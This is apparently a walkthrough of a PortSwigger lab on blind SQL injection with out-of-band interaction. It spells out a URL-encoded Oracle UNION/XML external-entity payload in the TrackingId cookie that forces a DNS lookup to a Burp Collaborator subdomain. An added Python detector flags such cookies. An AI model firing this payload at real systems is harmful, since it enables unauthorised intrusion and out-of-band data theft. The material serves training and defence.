https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band
Lab objective: exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.
Lab: Blind SQL injection with out-of-band interaction
- Open the `Collaborator` tab in Burp Suite and click the `Copy to clipboard` button. This will give you a unique subdomain. My subdomain is `usq6c7axj5wmu5p5e4z5fn748vem2cq1.oastify.com`.
- Go to the cheat sheet, find the DNS lookup section, and use the Oracle payload. The payload is `SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual`.
- Now replace `BURP-COLLABORATOR-SUBDOMAIN` with your subdomain.
- Because this is a UNION-based attack, you need to add `UNION` first, and finally you should URL-encode the payload. My payload is `TrackingId=BuDoLyKZ2n0Bxh9u'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//usq6c7axj5wmu5p5e4z5fn748vem2cq1.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--`.
- Then click `Poll now` in the `Collaborator` tab.
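
Seen from the defender's side, the request built in the steps above has a recognisable shape once the cookie is URL-decoded: a `UNION SELECT`, an Oracle XML function, and an external entity that names a remote host. The check below is an added example, not part of the original write-up or the lab. It takes the cookie name `TrackingId` from the request above; the sample `Cookie` headers and the host `collab.example.test` are constructed.

```python
import re
from urllib.parse import unquote_plus

UNION_SELECT = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)
# Oracle functions that parse XML supplied inside the query.
XML_FUNCS = re.compile(r"\b(?:EXTRACTVALUE|XMLTYPE)\s*\(", re.I)
# External (parameter) entity whose SYSTEM identifier is a remote URL; captures the host.
EXT_ENTITY = re.compile(
    r"<!ENTITY\s+%?\s*\w+\s+SYSTEM\s+[\"'](?:https?|ftp)://([^/\"']+)", re.I)

def decode(value, rounds=3):
    """URL-decode a bounded number of times so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_tracking_id(cookie_header):
    """Return indicator flags for the TrackingId cookie, or None if it is absent."""
    for part in cookie_header.split(";"):
        name, _, raw = part.strip().partition("=")
        if name != "TrackingId":
            continue
        value = decode(raw)
        entity = EXT_ENTITY.search(value)
        return {
            "union_select": bool(UNION_SELECT.search(value)),
            "xml_function": bool(XML_FUNCS.search(value)),
            "external_host": entity.group(1) if entity else None,
        }
    return None

# Constructed Cookie headers: one ordinary, one shaped like the request above
# with a constructed host in place of the Collaborator subdomain.
BENIGN = "TrackingId=BuDoLyKZ2n0Bxh9u; session=abc123"
SUSPICIOUS = """TrackingId=BuDoLyKZ2n0Bxh9u'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//collab.example.test/">+%25remote%3b]>'),'/l')+FROM+dual--; session=abc123"""

if __name__ == "__main__":
    for header in (BENIGN, SUSPICIOUS):
        print(inspect_tracking_id(header))
```

A non-empty `external_host` in a tracking cookie is worth correlating with outbound DNS or HTTP from the database host to that name.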